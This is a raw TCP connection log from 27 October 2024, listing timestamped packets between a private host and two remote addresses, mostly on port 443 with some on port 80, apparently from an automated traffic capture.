Oct 27, 2024 17:11:04.052040100 CET	57721	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.052046061 CET	443	57721	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.054780960 CET	57726	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.054836035 CET	443	57726	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.054917097 CET	57726	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.055968046 CET	57727	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.056050062 CET	443	57727	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.056118011 CET	57727	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.057370901 CET	57726	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.057399988 CET	443	57726	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.066764116 CET	57728	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.066817999 CET	443	57728	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.066899061 CET	57728	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.068958044 CET	80	57723	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:04.069020033 CET	57723	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:04.103950024 CET	57727	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.104020119 CET	443	57727	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.111229897 CET	57728	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.111262083 CET	443	57728	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.153804064 CET	57729	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.153829098 CET	443	57729	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.153917074 CET	57729	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.160559893 CET	57729	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.160569906 CET	443	57729	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.710287094 CET	443	57725	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.710841894 CET	57725	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.710901976 CET	443	57725	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.711389065 CET	57725	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.711441040 CET	443	57725	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.794239044 CET	443	57726	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.794572115 CET	57726	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.794621944 CET	443	57726	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.794970989 CET	57726	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.794997931 CET	443	57726	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.843863010 CET	443	57725	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.844024897 CET	443	57725	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.844094992 CET	57725	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.844188929 CET	57725	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.844233990 CET	443	57725	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.844263077 CET	57725	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.844278097 CET	443	57725	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.846601963 CET	57730	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.846687078 CET	443	57730	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.846755028 CET	57730	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.846860886 CET	57730	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.846880913 CET	443	57730	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.864393950 CET	443	57727	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.864676952 CET	57727	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.864702940 CET	443	57727	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.865253925 CET	57727	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.865264893 CET	443	57727	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.866389036 CET	443	57728	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.866672039 CET	57728	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.866691113 CET	443	57728	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.867012978 CET	57728	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.867022991 CET	443	57728	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.928369999 CET	443	57726	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.929209948 CET	443	57726	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.929276943 CET	57726	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.953509092 CET	57726	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.953509092 CET	57726	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.953555107 CET	443	57726	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.953579903 CET	443	57726	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.956027985 CET	57731	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.956085920 CET	443	57731	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.956141949 CET	57731	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.956285954 CET	57731	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.956300974 CET	443	57731	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.994847059 CET	443	57727	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.995004892 CET	443	57727	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.995081902 CET	57727	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.995153904 CET	57727	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.995214939 CET	443	57727	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.995253086 CET	57727	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.995269060 CET	443	57727	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.997370958 CET	57732	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.997416019 CET	443	57732	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.997500896 CET	57732	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.997623920 CET	57732	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.997646093 CET	443	57732	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.998694897 CET	443	57728	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.998836994 CET	443	57728	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.998917103 CET	57728	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.998917103 CET	57728	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.998917103 CET	57728	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.000653028 CET	57733	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.000720024 CET	443	57733	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.000802040 CET	57733	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.000899076 CET	57733	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.000931978 CET	443	57733	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.117827892 CET	443	57729	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.118180990 CET	57729	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.118196964 CET	443	57729	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.118602037 CET	57729	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.118606091 CET	443	57729	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.250576019 CET	443	57729	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.250724077 CET	443	57729	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.250782967 CET	57729	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.250802994 CET	57729	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.250813007 CET	443	57729	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.250824928 CET	57729	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.250828981 CET	443	57729	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.252648115 CET	57734	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.252686977 CET	443	57734	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.252757072 CET	57734	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.252861977 CET	57734	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.252887964 CET	443	57734	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.303392887 CET	57728	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.303447962 CET	443	57728	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.582726002 CET	443	57730	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.585721016 CET	57730	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.585755110 CET	443	57730	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.586100101 CET	57730	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.586131096 CET	443	57730	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.689493895 CET	443	57731	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.690342903 CET	57731	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.690363884 CET	443	57731	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.690752983 CET	57731	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.690758944 CET	443	57731	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.715111971 CET	443	57730	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.715274096 CET	443	57730	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.715449095 CET	57730	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.715615988 CET	57730	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.715648890 CET	443	57730	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.715696096 CET	57730	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.715711117 CET	443	57730	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.718036890 CET	57735	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.718127012 CET	443	57735	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.718220949 CET	57735	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.718348980 CET	57735	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.718372107 CET	443	57735	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.725488901 CET	443	57732	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.725824118 CET	57732	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.725851059 CET	443	57732	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.726213932 CET	57732	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.726224899 CET	443	57732	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.740979910 CET	443	57733	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.741349936 CET	57733	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.741410017 CET	443	57733	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.741738081 CET	57733	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.741751909 CET	443	57733	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.772480011 CET	57723	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:05.772825003 CET	57736	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:05.780930042 CET	80	57723	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:05.781001091 CET	57723	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:05.781078100 CET	80	57736	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:05.781147003 CET	57736	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:05.781279087 CET	57736	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:05.789252996 CET	80	57736	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:05.819582939 CET	443	57731	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.819737911 CET	443	57731	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.819788933 CET	57731	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.819811106 CET	57731	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.819823027 CET	443	57731	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.819832087 CET	57731	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.819835901 CET	443	57731	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.821670055 CET	57737	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.821753025 CET	443	57737	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.821831942 CET	57737	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.821933985 CET	57737	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.821969032 CET	443	57737	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.857781887 CET	443	57732	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.857924938 CET	443	57732	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.857999086 CET	57732	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.858163118 CET	57732	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.858163118 CET	57732	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.858181953 CET	443	57732	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.858203888 CET	443	57732	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.860465050 CET	57738	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.860551119 CET	443	57738	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.860626936 CET	57738	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.860724926 CET	57738	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.860757113 CET	443	57738	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.871649027 CET	443	57733	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.871865034 CET	443	57733	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.871949911 CET	57733	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.872112989 CET	57733	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.872112989 CET	57733	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.872155905 CET	443	57733	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.872181892 CET	443	57733	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.873652935 CET	57739	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.873694897 CET	443	57739	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.873769045 CET	57739	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.873867035 CET	57739	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.873898029 CET	443	57739	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.982244968 CET	443	57734	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.982639074 CET	57734	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.982671022 CET	443	57734	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:05.983123064 CET	57734	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:05.983133078 CET	443	57734	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.110589981 CET	443	57734	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.110901117 CET	443	57734	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.110969067 CET	57734	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.111042976 CET	57734	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.111042976 CET	57734	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.111068010 CET	443	57734	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.111088037 CET	443	57734	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.113960028 CET	57740	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.114063978 CET	443	57740	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.114154100 CET	57740	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.114310026 CET	57740	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.114346027 CET	443	57740	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.493429899 CET	443	57735	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.493895054 CET	57735	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.493963957 CET	443	57735	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.494687080 CET	57735	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.494699955 CET	443	57735	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.546080112 CET	443	57737	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.599772930 CET	57737	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.599832058 CET	443	57737	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.600315094 CET	57737	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.600330114 CET	443	57737	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.608881950 CET	443	57738	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.613424063 CET	57738	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.613481045 CET	443	57738	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.617180109 CET	57738	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.617196083 CET	443	57738	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.629509926 CET	443	57735	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.629707098 CET	443	57735	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.629781961 CET	57735	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.631177902 CET	57735	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.631225109 CET	443	57735	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.631253958 CET	57735	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.631269932 CET	443	57735	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.631818056 CET	443	57739	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.634876013 CET	57739	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.634897947 CET	443	57739	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.641741991 CET	57739	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.641755104 CET	443	57739	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.681996107 CET	80	57736	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:06.682085991 CET	57736	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:06.724045038 CET	443	57737	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.724097013 CET	443	57737	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.724163055 CET	57737	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.744680882 CET	443	57738	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.744853020 CET	443	57738	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.744925022 CET	57738	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.771974087 CET	443	57739	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.772130013 CET	443	57739	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.772195101 CET	57739	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.812227964 CET	57737	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.812228918 CET	57737	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.812283039 CET	443	57737	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.812311888 CET	443	57737	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.813276052 CET	57738	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.813276052 CET	57738	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.813325882 CET	443	57738	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.813354969 CET	443	57738	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.814970016 CET	57739	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.814989090 CET	443	57739	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.815012932 CET	57739	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.815025091 CET	443	57739	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.816138983 CET	57741	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.816159964 CET	443	57741	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.816217899 CET	57741	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.822824955 CET	57741	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.822837114 CET	443	57741	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.834175110 CET	57742	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.834214926 CET	443	57742	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.834295034 CET	57742	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.834386110 CET	57742	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.834403038 CET	443	57742	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.835303068 CET	57743	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.835323095 CET	443	57743	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.835385084 CET	57743	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.835751057 CET	57743	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.835762024 CET	443	57743	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.836261034 CET	57744	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.836323023 CET	443	57744	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.836416960 CET	57744	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.836505890 CET	57744	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.836525917 CET	443	57744	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.844906092 CET	443	57740	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.845268965 CET	57740	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.845279932 CET	443	57740	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.845676899 CET	57740	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.845681906 CET	443	57740	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.976018906 CET	443	57740	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.976111889 CET	443	57740	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.976270914 CET	57740	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.976270914 CET	57740	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.976270914 CET	57740	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.978106976 CET	57745	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.978157043 CET	443	57745	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:06.978230000 CET	57745	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.978374004 CET	57745	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:06.978418112 CET	443	57745	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.209523916 CET	57740	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.209552050 CET	443	57740	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.571075916 CET	443	57741	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.571527958 CET	57741	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.571541071 CET	443	57741	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.571954966 CET	57741	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.571959972 CET	443	57741	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.578330994 CET	443	57744	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.578651905 CET	57744	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.578694105 CET	443	57744	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.579041958 CET	57744	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.579055071 CET	443	57744	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.579334021 CET	443	57742	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.579588890 CET	57742	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.579605103 CET	443	57742	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.579927921 CET	57742	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.579932928 CET	443	57742	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.584480047 CET	443	57743	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.584734917 CET	57743	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.584748983 CET	443	57743	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.585077047 CET	57743	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.585081100 CET	443	57743	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.701417923 CET	443	57741	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.701561928 CET	443	57741	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.701618910 CET	57741	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.701678038 CET	57741	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.701693058 CET	443	57741	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.701700926 CET	57741	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.701705933 CET	443	57741	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.703939915 CET	57746	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.704029083 CET	443	57746	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.704117060 CET	57746	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.704229116 CET	57746	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.704251051 CET	443	57746	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.706583023 CET	443	57744	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.706881046 CET	443	57744	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.706939936 CET	57744	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.706985950 CET	57744	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.706985950 CET	57744	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.707012892 CET	443	57744	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.707036018 CET	443	57744	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.708626032 CET	57747	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.708684921 CET	443	57747	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.708760977 CET	57747	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.708879948 CET	57747	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.708905935 CET	443	57747	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.712937117 CET	443	57745	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.713238955 CET	57745	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.713284969 CET	443	57745	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.713618994 CET	57745	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.713629961 CET	443	57745	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.722259998 CET	443	57742	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.722752094 CET	443	57742	13.107.246.51	192.168.2.4
